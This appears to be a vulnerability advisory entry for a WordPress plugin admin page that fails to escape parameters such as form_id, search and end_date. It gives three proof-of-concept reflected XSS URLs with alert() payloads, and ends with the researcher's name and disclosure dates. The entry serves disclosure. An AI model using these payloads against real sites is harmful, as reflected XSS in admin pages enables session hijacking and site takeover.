The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F+ne97l&status&tab=entries&search&order=desc&orderby=fir+ https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez2u4g https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=e67x3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=
Gaetano Perrone
Gaetano Perrone
Yes
2021-11-14 (about 1 years ago)
2021-12-24 (about 1 years ago)
2022-04-10 (about 1 years ago)